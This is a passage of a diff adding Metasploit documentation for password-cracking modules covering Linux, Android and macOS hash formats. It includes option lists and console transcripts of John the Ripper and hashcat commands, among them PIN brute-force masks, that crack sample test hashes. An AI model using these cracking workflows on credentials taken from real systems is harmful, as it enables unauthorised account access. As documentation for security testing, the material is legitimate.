+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 4.545g/s 4654p/s 4654c/s 4654C/s test3:::..test2::k
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking sha512crypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha512crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha512crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1298   descrypt     des2_password      password          Single
+ 1299   descrypt     des_password       password          Single
+ 1300   descrypt     des_55             55                Normal
+ 1301   descrypt     des_pot_55         55                Already Cracked/POT
+ 1302   descrypt     des_passphrase     passphrase        Normal
+ 1303   md5crypt     md5_password       password          Single
+ 1304   md5crypt     md52_password      password          Single
+ 1305   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1306   bsdicrypt    bsdi_password      password          Single
+ 1307   sha256crypt  sha256_password    password          Single
+ 1308   sha512crypt  sha512_password    password          Single
+ 1309   bcrypt       blowfish_password  password          Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       des2_password      rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       des_55             rDpJV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       des_pot_55         fakeV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       des_passphrase     qiyh4XPJGsOZ2MEAyLkfWqeQ                                                                                   Nonreplayable hash  des
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       md52_password      $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       md5_pot_password   $1$O3JMY.Tw$AdLnLjQ/5jXF9.fakegHv/                                                                         Nonreplayable hash  md5
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       md5_pot_password   password                                                                                                   Password            
+                       md5_password       password                                                                                                   Password            
+                       md52_password      password                                                                                                   Password            
+                       des_pot_55         55                                                                                                         Password            
+                       des2_password      password                                                                                                   Password            
+                       des_password       password                                                                                                   Password            
+                       des_55             55                                                                                                         Password            
+                       des_passphrase     passphrase                                                                                                 Password            
+                       bsdi_password      password                                                                                                   Password            
+                       blowfish_password  password                                                                                                   Password            
+                       sha256_password    password                                                                                                   Password            
+                       sha512_password    password                                                                                                   Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, `blowfish true`, `sha256 true`, `sha512 true` to handle the bfish, sha256 and sha512 hashes,
+and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_linux
+resource (hashes_hashcat.rb)> set blowfish true
+blowfish => true
+resource (hashes_hashcat.rb)> set sha256 true
+sha256 => true
+resource (hashes_hashcat.rb)> set sha512 true
+sha512 => true
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-28535-hi2lkf
+[*] Wordlist file written out to /tmp/jtrtmp20190531-28535-47c707
+[*] Checking md5crypt hashes already cracked...
+[*] Cracking md5crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=p5KJBBFs --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=500 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking md5crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=p5KJBBFs --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=500 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1327   md5crypt   md5_password      password          Wordlist
+ 1328   md5crypt   md52_password     password          Wordlist
+ 1329   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=8qLTJwqG --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=8qLTJwqG --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1322   descrypt   des2_password     password          Wordlist
+ 1323   descrypt   des_password      password          Wordlist
+ 1324   descrypt   des_55            55                Incremental
+ 1325   descrypt   des_pot_55        55                Already Cracked/POT
+ 1327   md5crypt   md5_password      password          Wordlist
+ 1328   md5crypt   md52_password     password          Wordlist
+ 1329   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking bsdicrypt hashes already cracked...
+[*] Cracking bsdicrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=RShDcHzl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12400 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking bsdicrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=RShDcHzl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12400 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1322   descrypt   des2_password     password          Wordlist
+ 1323   descrypt   des_password      password          Wordlist
+ 1324   descrypt   des_55            55                Incremental
+ 1325   descrypt   des_pot_55        55                Already Cracked/POT
+ 1327   md5crypt   md5_password      password          Wordlist
+ 1328   md5crypt   md52_password     password          Wordlist
+ 1329   md5crypt   md5_pot_password  password          Already Cracked/POT
+ 1330   bsdicrypt  bsdi_password     password          Wordlist
+
+[*] Checking bcrypt hashes already cracked...
+[*] Cracking bcrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wNHLTkTX --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3200 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking bcrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wNHLTkTX --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3200 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username           Cracked Password  Method
+ -----  ---------  --------           ----------------  ------
+ 1322   descrypt   des2_password      password          Wordlist
+ 1323   descrypt   des_password       password          Wordlist
+ 1324   descrypt   des_55             55                Incremental
+ 1325   descrypt   des_pot_55         55                Already Cracked/POT
+ 1327   md5crypt   md5_password       password          Wordlist
+ 1328   md5crypt   md52_password      password          Wordlist
+ 1329   md5crypt   md5_pot_password   password          Already Cracked/POT
+ 1330   bsdicrypt  bsdi_password      password          Wordlist
+ 1333   bcrypt     blowfish_password  password          Wordlist
+
+[*] Checking sha256crypt hashes already cracked...
+[*] Cracking sha256crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=uNQu0c8S --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7400 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking sha256crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=uNQu0c8S --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7400 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1322   descrypt     des2_password      password          Wordlist
+ 1323   descrypt     des_password       password          Wordlist
+ 1324   descrypt     des_55             55                Incremental
+ 1325   descrypt     des_pot_55         55                Already Cracked/POT
+ 1327   md5crypt     md5_password       password          Wordlist
+ 1328   md5crypt     md52_password      password          Wordlist
+ 1329   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1330   bsdicrypt    bsdi_password      password          Wordlist
+ 1331   sha256crypt  sha256_password    password          Wordlist
+ 1333   bcrypt       blowfish_password  password          Wordlist
+
+[*] Checking sha512crypt hashes already cracked...
+[*] Cracking sha512crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=0GST7Eb1 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1800 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking sha512crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=0GST7Eb1 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1800 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1322   descrypt     des2_password      password          Wordlist
+ 1323   descrypt     des_password       password          Wordlist
+ 1324   descrypt     des_55             55                Incremental
+ 1325   descrypt     des_pot_55         55                Already Cracked/POT
+ 1327   md5crypt     md5_password       password          Wordlist
+ 1328   md5crypt     md52_password      password          Wordlist
+ 1329   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1330   bsdicrypt    bsdi_password      password          Wordlist
+ 1331   sha256crypt  sha256_password    password          Wordlist
+ 1332   sha512crypt  sha512_password    password          Wordlist
+ 1333   bcrypt       blowfish_password  password          Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       md5_password       password                                                                                                   Password            
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       des_pot_55         55                                                                                                         Password            
+                       des_password       password                                                                                                   Password            
+                       md52_password      $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       sha256_password    password                                                                                                   Password            
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512
+                       bsdi_password      password                                                                                                   Password            
+                       sha512_password    password                                                                                                   Password            
+                       blowfish_password  password                                                                                                   Password            
+                       des2_password      rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       des_55             55                                                                                                         Password            
+                       des2_password      password                                                                                                   Password            
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       des_pot_55         fakeV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       md52_password      password                                                                                                   Password            
+                       md5_pot_password   password                                                                                                   Password            
+                       md5_pot_password   $1$O3JMY.Tw$AdLnLjQ/5jXF9.fakegHv/                                                                         Nonreplayable hash  md5
+                       des_passphrase     qiyh4XPJGsOZ2MEAyLkfWqeQ                                                                                   Nonreplayable hash  des
+                       des_55             rDpJV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256
+```

documentation/modules/auxiliary/analyze/crack_mobile.md

@@ -0,0 +1,266 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode mobile (Android)
+  based password hashes, such as:
+
+  * `android-sha1` based passwords
+  * `android-samsung-sha1` based passwords
+  * `android-md5` based passwords
+
+  Formats:
+
+| Common               | John | Hashcat |
+|----------------------| -----|---------|
+| android-md5          | n/a  | 10      |
+| android-samsung-sha1 | n/a  | 5800    |
+| android-sha1         | n/a  | 110     |
+
+  Sources of hashes can be found here:
+  [source](https://hashcat.net/forum/thread-2202.html)
+
+## Verification Steps
+
+  1. Have at least one user with a `android-sha1`, `android-samsung-sha1`, or `android-md5` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_mobile```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **hashcat**
+
+   Use hashcat (default).
+
+## Options
+
+   **MD5**
+
+   Crack `android-md5` based passwords.  Default is `true`
+
+   **SHA1**
+
+   Crack `android-sha1` (non-samsung) based passwords.  Default is `true`
+
+   **SAMSUNG**
+
+   Crack `android-samsung-sha1` based passwords.  Default is `true`
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+msf5 post(android/gather/hashdump) > creds add user:androidsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-sha1
+msf5 post(android/gather/hashdump) > previous
+msf5 auxiliary(analyze/crack_mobile) > set showcommand true
+showcommand => true
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191112-9775-19hbg7j
+[*] Wordlist file written out to /tmp/jtrtmp20191112-9775-f3q0r1
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191112-9775-19hbg7j ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191112-9775-19hbg7j
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=UrEHXRVq --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191112-9775-19hbg7j /tmp/jtrtmp20191112-9775-f3q0r1
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 98     android-sha1  androidsha1  1234              Pin
+
+[*] Auxiliary module execution completed
+
+```
+
+### MD5, SHA1, SAMSUNG
+
+Create a password with each type, passwords are all `1234`.
+
+```
+msf5 > creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
+msf5 > creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
+msf5 > creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
+```
+
+```
+msf5 > use auxiliary/analyze/crack_mobile
+msf5 auxiliary(analyze/crack_mobile) > run
+
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20191113-29506-1xydi7
+[*] Wordlist file written out to /tmp/jtrtmp20191113-29506-aq6ph7
+[*] Checking android-sha1 hashes already cracked...
+[*] Cracking android-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=ishUl4hb --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=110 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username     Cracked Password  Method
+ -----  ---------     --------     ----------------  ------
+ 127    android-sha1  androidsha1  1234              Pin
+
+[*] Checking android-samsung-sha1 hashes already cracked...
+[*] Cracking android-samsung-sha1 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-samsung-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=SMD3wSMl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=5800 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+
+[*] Checking android-md5 hashes already cracked...
+[*] Cracking android-md5 hashes in pin mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-min=4 --increment-max=8 --attack-mode=3 --runtime=300 /tmp/hashes_tmp20191113-29506-1xydi7 ?d?d?d?d?d?d?d?d
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --increment --increment-max=4 --attack-mode=3 /tmp/hashes_tmp20191113-29506-1xydi7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking android-md5 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=outBsYDa --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=10 --attack-mode=0 /tmp/hashes_tmp20191113-29506-1xydi7 /tmp/jtrtmp20191113-29506-aq6ph7
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type             Username     Cracked Password  Method
+ -----  ---------             --------     ----------------  ------
+ 126    android-samsung-sha1  samsungsha1  1234              Pin
+ 127    android-sha1          androidsha1  1234              Pin
+ 128    android-md5           androidmd5   1234              Pin
+
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/analyze/crack_osx.md

@@ -0,0 +1,395 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Mac OS X
+  based password hashes, such as:
+
+  * `XSHA` based passwords (10.4-10.6)
+  * `XSHA512` based passwords (10.7)
+  * `PBKDF2-HMAC-SHA512` based passwords (10.8+)
+
+| Common             | John               | Hashcat |
+|--------------------|--------------------|---------|
+| xsha               | xsha               | 122     |
+| xsha512            | xsha512            | 1722    |
+| pbkdf2-hmac-sha512 | pbkdf2-hmac-sha512 | 7100    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `xsha`, `xsha512`, `pbkdf2-hmac-sha512` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_osx```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **PBKDF2-HMAC-SHA512**
+
+   Crack SHA12 hashes. Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
